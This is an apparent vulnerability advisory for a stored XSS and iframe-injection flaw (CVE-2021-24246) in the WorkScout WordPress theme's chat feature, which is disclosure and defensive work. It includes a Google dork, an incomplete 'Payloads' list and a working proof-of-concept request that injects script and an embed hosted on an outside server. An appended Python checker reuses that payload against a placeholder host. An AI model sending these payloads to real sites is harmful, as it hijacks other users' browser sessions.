/*!
 - # VULNERABILITY: WorkScout WordPress Theme <= 2.0.33 - Authenticated Persistent XSS & XFS
 - # GOOGLE DORK: inurl:/wp-content/themes/workscout/
 - # DATE: 2021-02-10
 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
 - # VENDOR: Purethemes [ https://purethemes.net ]
 - # SOFTWARE VERSION: <= 2.0.33
 - # SOFTWARE LINK: https://themeforest.net/item/workscout-job-board-wordpress-theme/13591801
 - # CVSS: AV:N/AC:L/PR:L/UI:N/S:C
 - # CWE: CWE-79
 - # CVE: CVE-2021-24246
*/

### -- [ Info: ]

[i] Authenticated Persistent XSS & XFS vulnerabilities were discovered in the WorkScout theme through v2.0.33 for WordPress.
[i] Plugin(s) affected: Workscout Core <= 1.3.3 by Purethemes [ https://purethemes.net ].
[i] Malicious JavaScript code or an iFrame can be injected as a chat message; the message is stored and rendered to the recipient without escaping.

### -- [ Impact: ]

[~] Malicious JavaScript code or iFrame injection, with the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.

### -- [ Payloads: ]

[$] ">
[$] ">

### -- [ PoC | Authenticated Persistent XSS & XFS | Chat messages: ]

[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: workscout.in
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://workscout.in/messages/?action=view&conv_id=163
Cookie: [user cookies]

action=workscout_send_message_chat&recipient=3&conversation_id=163&message=%3C!--%3E%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3C!--%3E%3Cembed%20src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E

### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze
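As an added defender-side example (not from the advisory and not Purethemes' code), the following Python helper parses an admin-ajax.php POST body of the shape shown in the PoC, decodes the message parameter, flags raw markup that would execute if the chat view renders it unescaped, and shows the output-side entity encoding that neutralises it. The request bodies are constructed and point at the placeholder host example.invalid.

```python
"""Constructed example (not from the advisory or the Workscout Core plugin):
inspect WorkScout chat-message requests for HTML markup and show the
output-side escaping that neutralises it."""
import html
import re
from urllib.parse import parse_qs

# Action and parameter names are taken from the advisory's PoC request.
CHAT_ACTION = "workscout_send_message_chat"
# Elements that execute script or frame external content (XSS / XFS).
ACTIVE_TAG_RE = re.compile(r"<\s*(script|iframe|embed|object|svg|img)\b", re.I)

# Constructed request bodies; the payload shape follows the PoC but points
# at the placeholder host example.invalid instead of a real server.
POC_BODY = (
    "action=workscout_send_message_chat&recipient=3&conversation_id=163"
    "&message=%3C!--%3E%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fexample.invalid"
    "%2Fa.js%3E%3C%2Fscript%3E%3C!--%3E%3Cembed%20src%3Dhttps%3A%2F%2F"
    "example.invalid%2Fx.html%3E"
)
BENIGN_BODY = ("action=workscout_send_message_chat&recipient=3"
               "&conversation_id=163&message=Hi%2C+is+the+position+still+open%3F")

def inspect_chat_request(body: str) -> dict:
    """Parse one urlencoded admin-ajax.php body and report what it carries."""
    params = parse_qs(body, keep_blank_values=True)
    action = params.get("action", [""])[0]
    if action != CHAT_ACTION:
        return {"relevant": False, "action": action, "flagged": False, "tags": []}
    message = params.get("message", [""])[0]  # parse_qs already URL-decodes
    tags = sorted({m.group(1).lower() for m in ACTIVE_TAG_RE.finditer(message)})
    return {
        "relevant": True,
        "action": action,
        "conversation_id": params.get("conversation_id", [""])[0],
        "recipient": params.get("recipient", [""])[0],
        "flagged": "<" in message,  # a plain chat message carries no raw markup
        "tags": tags,
        "message": message,
    }

def render_escaped(message: str) -> str:
    """What the chat view should emit: entity-encode before inserting into
    HTML (the equivalent of esc_html() on the WordPress side)."""
    return html.escape(message, quote=True)

if __name__ == "__main__":
    for body in (POC_BODY, BENIGN_BODY):
        verdict = inspect_chat_request(body)
        print(verdict["flagged"], verdict["tags"], render_escaped(verdict["message"]))
```

The same check can be pointed at a WAF or access log by feeding it each decoded POST body; a stored message that survives `render_escaped` unchanged never reaches the browser as live markup.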